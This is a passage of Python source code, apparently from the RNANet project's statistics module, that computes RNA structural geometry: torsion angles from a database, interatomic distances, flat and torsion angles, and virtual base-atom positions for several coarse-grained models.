"cSW_UG_tips_distance":2, "cSW_UG_C1'-B1-B1pair":2, "cSW_UG_B1-B1pair-C1'pair":3, "cSW_UG_C4'-C1'-B1-B1pair":2, "cSW_UG_B1-B1pair-C1'pair-C4'pair":1, "cSW_UG_alpha_1":2, "cSW_UG_alpha_2":2, "cSW_UG_dB1":3, "cSW_UG_dB2":2,
"tSW_UG_tips_distance":4, "tSW_UG_C1'-B1-B1pair":1, "tSW_UG_B1-B1pair-C1'pair":1, "tSW_UG_C4'-C1'-B1-B1pair":2, "tSW_UG_B1-B1pair-C1'pair-C4'pair":3, "tSW_UG_alpha_1":2, "tSW_UG_alpha_2":2, "tSW_UG_dB1":2, "tSW_UG_dB2":2,
"cHH_UG_tips_distance":5, "cHH_UG_C1'-B1-B1pair":3, "cHH_UG_B1-B1pair-C1'pair":2, "cHH_UG_C4'-C1'-B1-B1pair":2, "cHH_UG_B1-B1pair-C1'pair-C4'pair":2, "cHH_UG_alpha_1":2, "cHH_UG_alpha_2":3, "cHH_UG_dB1":4, "cHH_UG_dB2":5,
"tHH_UG_tips_distance":5, "tHH_UG_C1'-B1-B1pair":2, "tHH_UG_B1-B1pair-C1'pair":2, "tHH_UG_C4'-C1'-B1-B1pair":2, "tHH_UG_B1-B1pair-C1'pair-C4'pair":3, "tHH_UG_alpha_1":3, "tHH_UG_alpha_2":2, "tHH_UG_dB1":3, "tHH_UG_dB2":2,
"cSH_UG_tips_distance":5, "cSH_UG_C1'-B1-B1pair":1, "cSH_UG_B1-B1pair-C1'pair":2, "cSH_UG_C4'-C1'-B1-B1pair":2, "cSH_UG_B1-B1pair-C1'pair-C4'pair":2, "cSH_UG_alpha_1":2, "cSH_UG_alpha_2":2, "cSH_UG_dB1":3, "cSH_UG_dB2":4,
"tSH_UG_tips_distance":5, "tSH_UG_C1'-B1-B1pair":2, "tSH_UG_B1-B1pair-C1'pair":1, "tSH_UG_C4'-C1'-B1-B1pair":2, "tSH_UG_B1-B1pair-C1'pair-C4'pair":1, "tSH_UG_alpha_1":3, "tSH_UG_alpha_2":1, "tSH_UG_dB1":2, "tSH_UG_dB2":2,
"cHS_UG_tips_distance":3, "cHS_UG_C1'-B1-B1pair":2, "cHS_UG_B1-B1pair-C1'pair":3, "cHS_UG_C4'-C1'-B1-B1pair":2, "cHS_UG_B1-B1pair-C1'pair-C4'pair":4, "cHS_UG_alpha_1":2, "cHS_UG_alpha_2":3, "cHS_UG_dB1":3, "cHS_UG_dB2":4,
"tHS_UG_tips_distance":7, "tHS_UG_C1'-B1-B1pair":1, "tHS_UG_B1-B1pair-C1'pair":3, "tHS_UG_C4'-C1'-B1-B1pair":2, "tHS_UG_B1-B1pair-C1'pair-C4'pair":1, "tHS_UG_alpha_1":2, "tHS_UG_alpha_2":3, "tHS_UG_dB1":2, "tHS_UG_dB2":1,
"cSS_UG_tips_distance":2, "cSS_UG_C1'-B1-B1pair":2, "cSS_UG_B1-B1pair-C1'pair":2, "cSS_UG_C4'-C1'-B1-B1pair":2, "cSS_UG_B1-B1pair-C1'pair-C4'pair":2, "cSS_UG_alpha_1":1, "cSS_UG_alpha_2":2, "cSS_UG_dB1":2, "cSS_UG_dB2":3,
"tSS_UG_tips_distance":5, "tSS_UG_C1'-B1-B1pair":2, "tSS_UG_B1-B1pair-C1'pair":2, "tSS_UG_C4'-C1'-B1-B1pair":1, "tSS_UG_B1-B1pair-C1'pair-C4'pair":2, "tSS_UG_alpha_1":2, "tSS_UG_alpha_2":2, "tSS_UG_dB1":3, "tSS_UG_dB2":4,
"cWW_UU_tips_distance":1, "cWW_UU_C1'-B1-B1pair":2, "cWW_UU_B1-B1pair-C1'pair":3, "cWW_UU_C4'-C1'-B1-B1pair":3, "cWW_UU_B1-B1pair-C1'pair-C4'pair":2, "cWW_UU_alpha_1":2, "cWW_UU_alpha_2":2, "cWW_UU_dB1":2, "cWW_UU_dB2":1,
"tWW_UU_tips_distance":3, "tWW_UU_C1'-B1-B1pair":2, "tWW_UU_B1-B1pair-C1'pair":2, "tWW_UU_C4'-C1'-B1-B1pair":2, "tWW_UU_B1-B1pair-C1'pair-C4'pair":2, "tWW_UU_alpha_1":2, "tWW_UU_alpha_2":2, "tWW_UU_dB1":4, "tWW_UU_dB2":5,
"cWH_UU_tips_distance":2, "cWH_UU_C1'-B1-B1pair":2, "cWH_UU_B1-B1pair-C1'pair":2, "cWH_UU_C4'-C1'-B1-B1pair":3, "cWH_UU_B1-B1pair-C1'pair-C4'pair":3, "cWH_UU_alpha_1":2, "cWH_UU_alpha_2":3, "cWH_UU_dB1":3, "cWH_UU_dB2":5,
"tWH_UU_tips_distance":3, "tWH_UU_C1'-B1-B1pair":2, "tWH_UU_B1-B1pair-C1'pair":2, "tWH_UU_C4'-C1'-B1-B1pair":2, "tWH_UU_B1-B1pair-C1'pair-C4'pair":2, "tWH_UU_alpha_1":3, "tWH_UU_alpha_2":3, "tWH_UU_dB1":2, "tWH_UU_dB2":2,
"cHW_UU_tips_distance":1, "cHW_UU_C1'-B1-B1pair":2, "cHW_UU_B1-B1pair-C1'pair":3, "cHW_UU_C4'-C1'-B1-B1pair":1, "cHW_UU_B1-B1pair-C1'pair-C4'pair":3, "cHW_UU_alpha_1":2, "cHW_UU_alpha_2":2, "cHW_UU_dB1":3, "cHW_UU_dB2":4,
"tHW_UU_tips_distance":3, "tHW_UU_C1'-B1-B1pair":3, "tHW_UU_B1-B1pair-C1'pair":2, "tHW_UU_C4'-C1'-B1-B1pair":2, "tHW_UU_B1-B1pair-C1'pair-C4'pair":2, "tHW_UU_alpha_1":2, "tHW_UU_alpha_2":3, "tHW_UU_dB1":2, "tHW_UU_dB2":2,
"cWS_UU_tips_distance":5, "cWS_UU_C1'-B1-B1pair":1, "cWS_UU_B1-B1pair-C1'pair":1, "cWS_UU_C4'-C1'-B1-B1pair":2, "cWS_UU_B1-B1pair-C1'pair-C4'pair":3, "cWS_UU_alpha_1":2, "cWS_UU_alpha_2":1, "cWS_UU_dB1":2, "cWS_UU_dB2":1,
"tWS_UU_tips_distance":3, "tWS_UU_C1'-B1-B1pair":2, "tWS_UU_B1-B1pair-C1'pair":2, "tWS_UU_C4'-C1'-B1-B1pair":3, "tWS_UU_B1-B1pair-C1'pair-C4'pair":2, "tWS_UU_alpha_1":2, "tWS_UU_alpha_2":2, "tWS_UU_dB1":3, "tWS_UU_dB2":3,
"cSW_UU_tips_distance":5, "cSW_UU_C1'-B1-B1pair":1, "cSW_UU_B1-B1pair-C1'pair":3, "cSW_UU_C4'-C1'-B1-B1pair":2, "cSW_UU_B1-B1pair-C1'pair-C4'pair":3, "cSW_UU_alpha_1":2, "cSW_UU_alpha_2":3, "cSW_UU_dB1":1, "cSW_UU_dB2":4,
"tSW_UU_tips_distance":6, "tSW_UU_C1'-B1-B1pair":3, "tSW_UU_B1-B1pair-C1'pair":1, "tSW_UU_C4'-C1'-B1-B1pair":2, "tSW_UU_B1-B1pair-C1'pair-C4'pair":2, "tSW_UU_alpha_1":1, "tSW_UU_alpha_2":2, "tSW_UU_dB1":3, "tSW_UU_dB2":3,
"cHH_UU_tips_distance":5, "cHH_UU_C1'-B1-B1pair":1, "cHH_UU_B1-B1pair-C1'pair":1, "cHH_UU_C4'-C1'-B1-B1pair":3, "cHH_UU_B1-B1pair-C1'pair-C4'pair":2, "cHH_UU_alpha_1":2, "cHH_UU_alpha_2":2, "cHH_UU_dB1":1, "cHH_UU_dB2":5,
"tHH_UU_tips_distance":5, "tHH_UU_C1'-B1-B1pair":2, "tHH_UU_B1-B1pair-C1'pair":3, "tHH_UU_C4'-C1'-B1-B1pair":1, "tHH_UU_B1-B1pair-C1'pair-C4'pair":3, "tHH_UU_alpha_1":2, "tHH_UU_alpha_2":4, "tHH_UU_dB1":4, "tHH_UU_dB2":5,
"cSH_UU_tips_distance":5, "cSH_UU_C1'-B1-B1pair":1, "cSH_UU_B1-B1pair-C1'pair":3, "cSH_UU_C4'-C1'-B1-B1pair":2, "cSH_UU_B1-B1pair-C1'pair-C4'pair":2, "cSH_UU_alpha_1":3, "cSH_UU_alpha_2":2, "cSH_UU_dB1":2, "cSH_UU_dB2":5,
"tSH_UU_tips_distance":5, "tSH_UU_C1'-B1-B1pair":2, "tSH_UU_B1-B1pair-C1'pair":1, "tSH_UU_C4'-C1'-B1-B1pair":3, "tSH_UU_B1-B1pair-C1'pair-C4'pair":3, "tSH_UU_alpha_1":1, "tSH_UU_alpha_2":1, "tSH_UU_dB1":1, "tSH_UU_dB2":5,
"cHS_UU_tips_distance":7, "cHS_UU_C1'-B1-B1pair":2, "cHS_UU_B1-B1pair-C1'pair":2, "cHS_UU_C4'-C1'-B1-B1pair":2, "cHS_UU_B1-B1pair-C1'pair-C4'pair":2, "cHS_UU_alpha_1":2, "cHS_UU_alpha_2":2, "cHS_UU_dB1":3, "cHS_UU_dB2":2,
"tHS_UU_tips_distance":5, "tHS_UU_C1'-B1-B1pair":1, "tHS_UU_B1-B1pair-C1'pair":2, "tHS_UU_C4'-C1'-B1-B1pair":2, "tHS_UU_B1-B1pair-C1'pair-C4'pair":1, "tHS_UU_alpha_1":1, "tHS_UU_alpha_2":2, "tHS_UU_dB1":4, "tHS_UU_dB2":1,
"cSS_UU_tips_distance":5, "cSS_UU_C1'-B1-B1pair":2, "cSS_UU_B1-B1pair-C1'pair":2, "cSS_UU_C4'-C1'-B1-B1pair":2, "cSS_UU_B1-B1pair-C1'pair-C4'pair":3, "cSS_UU_alpha_1":2, "cSS_UU_alpha_2":2, "cSS_UU_dB1":6, "cSS_UU_dB2":4,
"tSS_UU_tips_distance":8, "tSS_UU_C1'-B1-B1pair":1, "tSS_UU_B1-B1pair-C1'pair":1, "tSS_UU_C4'-C1'-B1-B1pair":2, "tSS_UU_B1-B1pair-C1'pair-C4'pair":1, "tSS_UU_alpha_1":1, "tSS_UU_alpha_2":2, "tSS_UU_dB1":3, "tSS_UU_dB2":4,
}
@trace_unhandled_exceptions
def retrieve_angles(db, res):
"""
Retrieve torsion angles from RNANet.db and convert them to degrees
"""
# Retrieve angle values
with sqlite3.connect(runDir + "/results/RNANet.db") as conn:
conn.execute('pragma journal_mode=wal')
df = pd.read_sql(f"""SELECT chain_id, nt_name, alpha, beta, gamma, delta, epsilon, zeta, chi
FROM (
SELECT chain_id FROM chain JOIN structure ON chain.structure_id = structure.pdb_id
WHERE chain.rfam_acc = 'unmappd' AND structure.resolution <= {res} AND issue = 0
) AS c NATURAL JOIN nucleotide
WHERE nt_name='A' OR nt_name='C' OR nt_name='G' OR nt_name='U';""", conn)
# convert to degrees
j = (180.0/np.pi)
torsions = df.iloc[:, 0:2].merge(
df.iloc[:, 2:9].applymap(lambda x: j*x if x <= np.pi else j*x-360.0, na_action='ignore'),
left_index=True, right_index=True
)
return torsions
def retrieve_eta_theta(db, res):
"""
Retrieve pseudotorsions from RNANet.db and convert them to degrees
"""
# Retrieve angle values
with sqlite3.connect(runDir + "/results/RNANet.db") as conn:
conn.execute('pragma journal_mode=wal')
df = pd.read_sql(f"""SELECT chain_id, nt_name, eta, theta, eta_prime, theta_prime, eta_base, theta_base
FROM (
SELECT chain_id FROM chain JOIN structure ON chain.structure_id = structure.pdb_id
WHERE chain.rfam_acc = 'unmappd' AND structure.resolution <= {res} AND issue = 0
) AS c NATURAL JOIN nucleotide
WHERE nt_name='A' OR nt_name='C' OR nt_name='G' OR nt_name='U';""", conn)
# convert to degrees
j = (180.0/np.pi)
pseudotorsions = df.iloc[:, 0:2].merge(
df.iloc[:, 2:8].applymap(lambda x: j*x if x <= np.pi else j*x-360.0, na_action='ignore'),
left_index=True, right_index=True
)
return pseudotorsions
def get_euclidian_distance(L1, L2):
"""
Returns the distance between two points (coordinates in lists)
"""
if len(L1)*len(L2) == 0:
return np.nan
if len(L1) == 1:
L1 = L1[0]
if len(L2) == 1:
L2 = L2[0]
e = 0
for i in range(len(L1)):
try:
e += float(L1[i] - L2[i])**2
except TypeError:
print("Terms: ", L1, L2)
except IndexError:
print("Terms: ", L1, L2)
return np.sqrt(e)
def get_flat_angle(L1, L2, L3):
"""
Returns the flat angles (in radians) defined by 3 points.
L1, L2, L3 : lists of (x,y,z) coordinates
Returns NaN if one of the lists is empty.
"""
if len(L1)*len(L2)*len(L3) == 0:
return np.nan
return calc_angle(Vector(L1[0]), Vector(L2[0]), Vector(L3[0]))*(180/np.pi)
def get_torsion_angle(L1, L2, L3, L4):
if len(L1)*len(L2)*len(L3)*len(L4) == 0:
return np.nan
return calc_dihedral(Vector(L1[0]), Vector(L2[0]), Vector(L3[0]), Vector(L4[0]))*(180/np.pi)
def pos_b1(res):
"""
Returns the coordinates of virtual atom B1 (center of the first aromatic cycle)
"""
coordb1=[]
somme_x_b1=0
somme_y_b1=0
somme_z_b1=0
moy_x_b1=0
moy_y_b1=0
moy_z_b1=0
#different cases
#some residues have 2 aromatic cycles
if res.get_resname() in ['A', 'G', '2MG', '7MG', 'MA6', '6IA', 'OMG' , '2MA', 'B9B', 'A2M', '1MA', 'E7G', 'P7G', 'B8W', 'B8K', 'BGH', '6MZ', 'E6G', 'MHG', 'M7A', 'M2G', 'P5P', 'G7M', '1MG', 'T6A', 'MIA', 'YG', 'YYG', 'I', 'DG', 'N79', '574', 'DJF', 'AET', '12A', 'ANZ', 'UY4'] :
c=0
names=[]
for atom in res :
if (atom.get_fullname() in ['N9', 'C8', 'N7', 'C4', 'C5']) :
c=c+1
names.append(atom.get_name())
coord=atom.get_vector()
somme_x_b1=somme_x_b1+coord[0]
somme_y_b1=somme_y_b1+coord[1]
somme_z_b1=somme_z_b1+coord[2]
else :
c=c
#calcul coord B1
if c != 0 :
moy_x_b1=somme_x_b1/c
moy_y_b1=somme_y_b1/c
moy_z_b1=somme_z_b1/c
coordb1.append(moy_x_b1)
coordb1.append(moy_y_b1)
coordb1.append(moy_z_b1)
#others have only one cycle
if res.get_resname() in ['C', 'U', 'AG9', '70U', '1RN', 'RSP', '3AU', 'CM0', 'U8U', 'IU', 'E3C', '4SU', '5HM', 'LV2', 'LHH', '4AC', 'CH', 'Y5P', '2MU', '4OC', 'B8T', 'JMH', 'JMC', 'DC', 'B9H', 'UR3', 'I4U', 'B8Q', 'P4U', 'OMU', 'OMC', '5MU', 'H2U', 'CBV', 'M1Y', 'B8N', '3TD', 'B8H'] :
c=0
for atom in res :
if (atom.get_fullname() in ['C6', 'N3', 'N1', 'C2', 'C4', 'C5']):
c=c+1
coord=atom.get_vector()
somme_x_b1=somme_x_b1+coord[0]
somme_y_b1=somme_y_b1+coord[1]
somme_z_b1=somme_z_b1+coord[2]
#calcul coord B1
if c != 0 :
moy_x_b1=somme_x_b1/c
moy_y_b1=somme_y_b1/c
moy_z_b1=somme_z_b1/c
coordb1.append(moy_x_b1)
coordb1.append(moy_y_b1)
coordb1.append(moy_z_b1)
if len(coordb1):
return [coordb1]
else:
return []
def pos_b2(res):
"""
Returns the coordinates of virtual atom B2 (center of the second aromatic cycle, if exists)
"""
coordb2=[]
somme_x_b2=0
somme_y_b2=0
somme_z_b2=0
moy_x_b2=0
moy_y_b2=0
moy_z_b2=0
if res.get_resname() in ['A', 'G', '2MG', '7MG', 'MA6', '6IA', 'OMG' , '2MA', 'B9B', 'A2M', '1MA', 'E7G', 'P7G', 'B8W', 'B8K', 'BGH', '6MZ', 'E6G', 'MHG', 'M7A', 'M2G', 'P5P', 'G7M', '1MG', 'T6A', 'MIA', 'YG', 'YYG', 'I', 'DG', 'N79', '574', 'DJF', 'AET', '12A', 'ANZ', 'UY4'] : #2 cycles aromatiques
c=0
for atom in res :
if atom.get_fullname() in ['C6', 'N3', 'N1', 'C2', 'C4', 'C5'] :
c=c+1
coord=atom.get_vector()
somme_x_b2=somme_x_b2+coord[0]
somme_y_b2=somme_y_b2+coord[1]
somme_z_b2=somme_z_b2+coord[2]
#calcul coord B2
if c!=0 :
moy_x_b2=somme_x_b2/c
moy_y_b2=somme_y_b2/c
moy_z_b2=somme_z_b2/c
coordb2.append(moy_x_b2)
coordb2.append(moy_y_b2)
coordb2.append(moy_z_b2)
if len(coordb2):
return [coordb2]
else:
return []
@trace_unhandled_exceptions
def measures_aa(name, s, thr_idx):
"""
Measures the distance between atoms linked by covalent bonds
"""
# do not recompute something already computed
if os.path.isfile(runDir + "/results/geometry/all-atoms/distances/dist_atoms_" + name + ".csv"):
return
last_o3p = [] # o3 'of the previous nucleotide linked to the P of the current nucleotide
l_common = []
l_purines = []
l_pyrimidines = []
setproctitle(f"RNANet statistics.py Worker {thr_idx+1} measure_aa_dists({name})")
chain = next(s[0].get_chains()) # 1 chain per file
residues = list(chain.get_residues())
pbar = tqdm(total=len(residues), position=thr_idx+1, desc=f"Worker {thr_idx+1}: {name} measure_aa_dists", unit="res", leave=False)
pbar.update(0)
for res in chain :
# for residues A, G, C, U
op3_p = []
p_op1 = []
p_op2 = []
p_o5p = []
o5p_c5p = []
c5p_c4p = []
c4p_o4p = []
o4p_c1p = []
c1p_c2p = []
c2p_o2p = []
c2p_c3p = []
c3p_o3p = []
c4p_c3p = []
# if res = A or G
c1p_n9 = None
n9_c8 = None
c8_n7 = None
n7_c5 = None
c5_c6 = None
c6_n1 = None
n1_c2 = None
c2_n3 = None
n3_c4 = None
c4_n9 = None
c4_c5 = None
# if res = G
c6_o6 = None
c2_n2 = None
# if res = A
c6_n6 = None
# if res = C or U
c1p_n1 = None
n1_c6 = None
c6_c5 = None
c5_c4 = None
c4_n3 = None
n3_c2 = None
c2_n1 = None
c2_o2 = None
# if res = C
c4_n4 = None
# if res = U
c4_o4 = None
last_o3p_p = None
if res.get_resname()=='A' or res.get_resname()=='G' or res.get_resname()=='C' or res.get_resname()=='U' :
# get the coordinates of the atoms
atom_p = [ atom.get_coord() for atom in res if atom.get_name() == "P"]
atom_op3 = [ atom.get_coord() for atom in res if "OP3" in atom.get_fullname() ] # OP3 belongs to previous nucleotide !
atom_op1 = [ atom.get_coord() for atom in res if "OP1" in atom.get_fullname() ]
atom_op2 = [ atom.get_coord() for atom in res if "OP2" in atom.get_fullname() ]
atom_o5p= [ atom.get_coord() for atom in res if "O5'" in atom.get_fullname() ]
atom_c5p = [ atom.get_coord() for atom in res if "C5'" in atom.get_fullname() ]
atom_c4p = [ atom.get_coord() for atom in res if "C4'" in atom.get_fullname() ]
atom_o4p = [ atom.get_coord() for atom in res if "O4'" in atom.get_fullname() ]
atom_c3p = [ atom.get_coord() for atom in res if "C3'" in atom.get_fullname() ]
atom_o3p = [ atom.get_coord() for atom in res if "O3'" in atom.get_fullname() ]
atom_c2p = [ atom.get_coord() for atom in res if "C2'" in atom.get_fullname() ]
atom_o2p = [ atom.get_coord() for atom in res if "O2'" in atom.get_fullname() ]
atom_c1p = [ atom.get_coord() for atom in res if "C1'" in atom.get_fullname() ]
atom_n9 = [ atom.get_coord() for atom in res if "N9" in atom.get_fullname() ]
atom_c8 = [ atom.get_coord() for atom in res if "C8" in atom.get_fullname() ]
atom_n7 = [ atom.get_coord() for atom in res if "N7" in atom.get_fullname() ]
atom_c5 = [ atom.get_coord() for atom in res if atom.get_name() == "C5"]
atom_c6 = [ atom.get_coord() for atom in res if "C6" in atom.get_fullname() ]
atom_o6 = [ atom.get_coord() for atom in res if "O6" in atom.get_fullname() ]
atom_n6 = [ atom.get_coord() for atom in res if "N6" in atom.get_fullname() ]
atom_n1 = [ atom.get_coord() for atom in res if "N1" in atom.get_fullname() ]
atom_c2 = [ atom.get_coord() for atom in res if atom.get_name() == "C2"]
atom_n2 = [ atom.get_coord() for atom in res if "N2" in atom.get_fullname() ]
atom_o2 = [ atom.get_coord() for atom in res if atom.get_name() == "O2"]
atom_n3 = [ atom.get_coord() for atom in res if "N3" in atom.get_fullname() ]
atom_c4 = [ atom.get_coord() for atom in res if atom.get_name() == "C4" ]
atom_n4 = [ atom.get_coord() for atom in res if "N4" in atom.get_fullname() ]
atom_o4 = [ atom.get_coord() for atom in res if atom.get_name() == "O4"]
if len(atom_op3):
last_o3p_p = get_euclidian_distance(atom_op3, atom_p) # This nucleotide has an OP3 atom (likely the begining of a chain)
else:
last_o3p_p = get_euclidian_distance(last_o3p, atom_p) # link with the previous nucleotide
p_op1 = get_euclidian_distance(atom_op1, atom_p)
p_op2 = get_euclidian_distance(atom_op2, atom_p)
p_o5p = get_euclidian_distance(atom_o5p, atom_p)
o5p_c5p = get_euclidian_distance(atom_o5p, atom_c5p)
c5p_c4p = get_euclidian_distance(atom_c5p, atom_c4p)
c4p_o4p = get_euclidian_distance(atom_c4p, atom_o4p)
c4p_c3p = get_euclidian_distance(atom_c4p, atom_c3p)
o4p_c1p = get_euclidian_distance(atom_o4p, atom_c1p)
c1p_c2p = get_euclidian_distance(atom_c1p, atom_c2p)
c2p_o2p = get_euclidian_distance(atom_c2p, atom_o2p)
c2p_c3p = get_euclidian_distance(atom_c2p, atom_c3p)
c3p_o3p = get_euclidian_distance(atom_c3p, atom_o3p)
last_o3p = atom_o3p # o3' of this residue becomes the previous o3' of the following
# different cases for the aromatic cycles
if res.get_resname()=='A' or res.get_resname()=='G':
# compute the distances between atoms of aromatic cycles
c1p_n9 = get_euclidian_distance(atom_c1p, atom_n9)
n9_c8 = get_euclidian_distance(atom_n9, atom_c8)
c8_n7 = get_euclidian_distance(atom_c8, atom_n7)
n7_c5 = get_euclidian_distance(atom_n7, atom_c5)
c5_c6 = get_euclidian_distance(atom_c5, atom_c6)
c6_o6 = get_euclidian_distance(atom_c6, atom_o6)
c6_n6 = get_euclidian_distance(atom_c6, atom_n6)
c6_n1 = get_euclidian_distance(atom_c6, atom_n1)
n1_c2 = get_euclidian_distance(atom_n1, atom_c2)
c2_n2 = get_euclidian_distance(atom_c2, atom_n2)
c2_n3 = get_euclidian_distance(atom_c2, atom_n3)
n3_c4 = get_euclidian_distance(atom_n3, atom_c4)
c4_n9 = get_euclidian_distance(atom_c4, atom_n9)
c4_c5 = get_euclidian_distance(atom_c4, atom_c5)
if res.get_resname()=='C' or res.get_resname()=='U' :
c1p_n1 = get_euclidian_distance(atom_c1p, atom_n1)
n1_c6 = get_euclidian_distance(atom_n1, atom_c6)
c6_c5 = get_euclidian_distance(atom_c6, atom_c5)
c5_c4 = get_euclidian_distance(atom_c5, atom_c4)
c4_n3 = get_euclidian_distance(atom_c4, atom_n3)
n3_c2 = get_euclidian_distance(atom_n3, atom_c2)
c2_o2 = get_euclidian_distance(atom_c2, atom_o2)
c2_n1 = get_euclidian_distance(atom_c2, atom_n1)
c4_n4 = get_euclidian_distance(atom_c4, atom_n4)
c4_o4 = get_euclidian_distance(atom_c4, atom_o4)
l_common.append([res.get_resname(), last_o3p_p, p_op1, p_op2, p_o5p, o5p_c5p, c5p_c4p, c4p_o4p, c4p_c3p, o4p_c1p, c1p_c2p, c2p_o2p, c2p_c3p, c3p_o3p] )
l_purines.append([c1p_n9, n9_c8, c8_n7, n7_c5, c5_c6, c6_o6, c6_n6, c6_n1, n1_c2, c2_n2, c2_n3, n3_c4, c4_n9, c4_c5])
l_pyrimidines.append([c1p_n1, n1_c6, c6_c5, c5_c4, c4_n3, n3_c2, c2_o2, c2_n1, c4_n4, c4_o4])
pbar.update(1)
df_comm = pd.DataFrame(l_common, columns=["Residue", "O3'-P", "P-OP1", "P-OP2", "P-O5'", "O5'-C5'", "C5'-C4'", "C4'-O4'", "C4'-C3'", "O4'-C1'", "C1'-C2'", "C2'-O2'", "C2'-C3'", "C3'-O3'"])
df_pur = pd.DataFrame(l_purines, columns=["C1'-N9", "N9-C8", "C8-N7", "N7-C5", "C5-C6", "C6-O6", "C6-N6", "C6-N1", "N1-C2", "C2-N2", "C2-N3", "N3-C4", "C4-N9", "C4-C5" ])
df_pyr = pd.DataFrame(l_pyrimidines, columns=["C1'-N1", "N1-C6", "C6-C5", "C5-C4", "C4-N3", "N3-C2", "C2-O2", "C2-N1", "C4-N4", "C4-O4"])
df = pd.concat([df_comm, df_pur, df_pyr], axis = 1)
pbar.close()
df.to_csv(runDir + "/results/geometry/all-atoms/distances/dist_atoms_" + name + ".csv")
@trace_unhandled_exceptions
def measures_pyle(name, s, thr_idx):
"""
Measures the distances and plane angles involving C1' and P atoms
Saves the results in a dataframe
"""
# do not recompute something already computed
if (os.path.isfile(runDir + '/results/geometry/Pyle/angles/flat_angles_pyle_' + name + '.csv') and
os.path.isfile(runDir + "/results/geometry/Pyle/distances/distances_pyle_" + name + ".csv")):
return
l_dist = []
l_angl = []
last_p = []
last_c1p = []
last_c4p = []
setproctitle(f"RNANet statistics.py Worker {thr_idx+1} measures_pyle({name})")
chain = next(s[0].get_chains())
for res in tqdm(chain, position=thr_idx+1, desc=f"Worker {thr_idx+1}: {name} measures_pyle", unit="res", leave=False):
p_c1p_psuiv = np.nan
c1p_psuiv_c1psuiv = np.nan
if res.get_resname() not in ['ATP', 'CCC', 'A3P', 'A23', 'GDP', 'RIA', "2BA"] :
atom_p = [ atom.get_coord() for atom in res if atom.get_name() == "P"]
atom_c1p = [ atom.get_coord() for atom in res if "C1'" in atom.get_fullname() ]
atom_c4p = [ atom.get_coord() for atom in res if "C4'" in atom.get_fullname() ]
if len(atom_c1p) > 1:
for atom in res:
if "C1'" in atom.get_fullname():
print("\n", atom.get_fullname(), "-", res.get_resname(), "\n")
p_c1p_psuiv = get_flat_angle(last_p, last_c1p, atom_p)
c1p_psuiv_c1psuiv = get_flat_angle(last_c1p, atom_p, atom_c1p)
c1p_psuiv = get_euclidian_distance(last_c1p, atom_p)
p_c1p = get_euclidian_distance(atom_p, atom_c1p)
c4p_psuiv = get_euclidian_distance(last_c4p, atom_p)
p_c4p = get_euclidian_distance(atom_p, atom_c4p)
last_p = atom_p
last_c1p = atom_c1p
last_c4p = atom_c4p
l_dist.append([res.get_resname(), c1p_psuiv, p_c1p, c4p_psuiv, p_c4p])
l_angl.append([res.get_resname(), p_c1p_psuiv, c1p_psuiv_c1psuiv])
df = pd.DataFrame(l_dist, columns=["Residue", "C1'-P", "P-C1'", "C4'-P", "P-C4'"])
df.to_csv(runDir + "/results/geometry/Pyle/distances/distances_pyle_" + name + ".csv")
df = pd.DataFrame(l_angl, columns=["Residue", "P-C1'-P°", "C1'-P°-C1'°"])
df.to_csv(runDir + "/results/geometry/Pyle/angles/flat_angles_pyle_"+name+".csv")
@trace_unhandled_exceptions
def measures_hrna(name, s, thr_idx):
"""
Measures the distance/angles between the atoms of the HiRE-RNA model linked by covalent bonds
"""
# do not recompute something already computed
if (os.path.isfile(runDir + '/results/geometry/HiRE-RNA/distances/distances_HiRERNA '+name+'.csv') and
os.path.isfile(runDir + '/results/geometry/HiRE-RNA/angles/angles_HiRERNA '+name+'.csv') and
os.path.isfile(runDir + '/results/geometry/HiRE-RNA/torsions/torsions_HiRERNA '+name+'.csv')):
return
l_dist = []
l_angl = []
l_tors = []
last_c4p = []
last_c5p = []
last_c1p = []
last_o5p = []
setproctitle(f"RNANet statistics.py Worker {thr_idx+1} measures_hrna({name})")
chain = next(s[0].get_chains())
residues=list(chain.get_residues())
for res in tqdm(chain, position=thr_idx+1, desc=f"Worker {thr_idx+1}: {name} measures_hrna", unit="res", leave=False):
# distances
p_o5p = None
o5p_c5p = None
c5p_c4p = None
c4p_c1p = None
c1p_b1 = None
b1_b2 = None
last_c4p_p = np.nan
# angles
p_o5p_c5p = None
o5p_c5p_c4p = None
c5p_c4p_c1p = None
c4p_c1p_b1 = None
c1p_b1_b2 = None
lastc4p_p_o5p = None
lastc5p_lastc4p_p = None
lastc1p_lastc4p_p = None
# torsions
p_o5_c5_c4 = np.nan
o5_c5_c4_c1 = np.nan
c5_c4_c1_b1 = np.nan
c4_c1_b1_b2 = np.nan
o5_c5_c4_psuiv = np.nan
c5_c4_psuiv_o5suiv = np.nan
c4_psuiv_o5suiv_c5suiv = np.nan
c1_c4_psuiv_o5suiv = np.nan
if res.get_resname() not in ['ATP', 'CCC', 'A3P', 'A23', 'GDP', 'RIA', "2BA"] : # several phosphate groups, ignore
atom_p = [ atom.get_coord() for atom in res if atom.get_name() == "P"]
atom_o5p = [ atom.get_coord() for atom in res if "O5'" in atom.get_fullname() ]
atom_c5p = [ atom.get_coord() for atom in res if "C5'" in atom.get_fullname() ]
atom_c4p = [ atom.get_coord() for atom in res if "C4'" in atom.get_fullname() ]
atom_c1p = [ atom.get_coord() for atom in res if "C1'" in atom.get_fullname() ]
atom_b1 = pos_b1(res) # position b1 to be calculated, depending on the case
atom_b2 = pos_b2(res) # position b2 to be calculated only for those with 2 cycles
# Distances. If one of the atoms is empty, the euclidian distance returns NaN.
last_c4p_p = get_euclidian_distance(last_c4p, atom_p)
p_o5p = get_euclidian_distance(atom_p, atom_o5p)
o5p_c5p = get_euclidian_distance(atom_o5p, atom_c5p)
c5p_c4p = get_euclidian_distance(atom_c5p, atom_c4p)
c4p_c1p = get_euclidian_distance(atom_c4p, atom_c1p)
c1p_b1 = get_euclidian_distance(atom_c1p, atom_b1)
b1_b2 = get_euclidian_distance(atom_b1, atom_b2)
# flat angles. Same.
lastc4p_p_o5p = get_flat_angle(last_c4p, atom_p, atom_o5p)
lastc1p_lastc4p_p = get_flat_angle(last_c1p, last_c4p, atom_p)
lastc5p_lastc4p_p = get_flat_angle(last_c5p, last_c4p, atom_p)
p_o5p_c5p = get_flat_angle(atom_p, atom_o5p, atom_c5p)
o5p_c5p_c4p = get_flat_angle(atom_o5p, atom_c5p, atom_c4p)
c5p_c4p_c1p = get_flat_angle(atom_c5p, atom_c4p, atom_c1p)
c4p_c1p_b1 = get_flat_angle(atom_c4p, atom_c1p, atom_b1)
c1p_b1_b2 = get_flat_angle(atom_c1p, atom_b1, atom_b2)
# torsions. Idem.
